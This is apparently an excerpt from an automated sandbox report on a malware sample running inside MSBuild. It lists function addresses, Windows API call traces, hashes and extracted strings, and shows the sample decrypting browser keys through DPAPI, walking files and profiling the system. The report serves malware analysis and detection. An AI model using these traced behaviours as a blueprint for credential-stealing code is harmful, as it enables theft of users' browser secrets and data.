Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: 96129ee170b6e52e4a698042c6e04e57a17f8ea6b04b39fd16cd668f0541581b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: F23165B05047049FDB349F25D898BE77AE9EB14354F108B2FE296D2680D33898C4CB99

Function 6C4AC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C4AC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C4AC969
GetSystemInfo.KERNEL32(?), ref: 6C4AC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C4AC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C4AC9E2

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 61eeddf927a29831c38fe123b95f8e0c8c875e20cdb2cf8580e60fe5ec2cefd1
Instruction ID: 82148806e6809da55d8ed946e48b6c4ccb0032c9a934ef2c07138baf8e624ec3
Opcode Fuzzy Hash: 61eeddf927a29831c38fe123b95f8e0c8c875e20cdb2cf8580e60fe5ec2cefd1
Instruction Fuzzy Hash: 17210771741204ABDB05EBA8CC89FAE73BDAB46344F51021EF907A7F80EB619C05C799

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 00410F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: b9c3853fef23caf07c4bbe14b1cc1093c34e1e9f3ec2cfce986836b4223b7196
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: b9c3853fef23caf07c4bbe14b1cc1093c34e1e9f3ec2cfce986836b4223b7196
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416ED6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416EDD
lstrlenA.KERNEL32(?,0000001C), ref: 00416EE8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416F6C

Strings

ERROR, xrefs: 00416F64

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 3839105bb85ea6eef1903a5d03da892e36e8fa90d6621a210e44ba5eb4c8eece
Instruction ID: 206493d018c0af61ad3247b9a1edf73ec3ff293b71de332acb6c3f6d1aa8c941
Opcode Fuzzy Hash: 3839105bb85ea6eef1903a5d03da892e36e8fa90d6621a210e44ba5eb4c8eece
Instruction Fuzzy Hash: 5711B131900209AFCB40FF75D9026DCBBB1BF04308B80413AE814E3191D739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
Instruction ID: ac01e61fcc3a8dc6a5e43971812eb7396920612e483317b6d6b91c956b259603
Opcode Fuzzy Hash: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
Instruction Fuzzy Hash: 84F0B471600218ABDB24EB68DC45FEF77BC9B44B08F10006AF645D7180EEB5DAC58B54

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: ad945740b977ff1f36274d2f8366a4f9c8c35b8e2ebe285de2857eeab0d8ecfe
Instruction ID: f20441c87b7e9a3b4f7029758dad72c3b509e7d63b864ac140ecc9ec0d22b659
Opcode Fuzzy Hash: ad945740b977ff1f36274d2f8366a4f9c8c35b8e2ebe285de2857eeab0d8ecfe
Instruction Fuzzy Hash: 2D714072A00119ABCF01FBA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B98

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

moz-extension+++, xrefs: 0040D4DD
^userContextId=4294967295, xrefs: 0040D4D7

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: ae3a14dfbe6f3ec2ed6d2cc1cd355128f425982979edd8864c0be2403f7a9293
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: ae3a14dfbe6f3ec2ed6d2cc1cd355128f425982979edd8864c0be2403f7a9293
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

, xrefs: 00408241
"encrypted_key":", xrefs: 004081DF
DPAPI, xrefs: 0040821B

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 034d3ebf0bbd41a52b14413c82dab1af8e55324f20d12265e500f68ae9061e99
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 034d3ebf0bbd41a52b14413c82dab1af8e55324f20d12265e500f68ae9061e99
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

~{A, xrefs: 004164AE

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
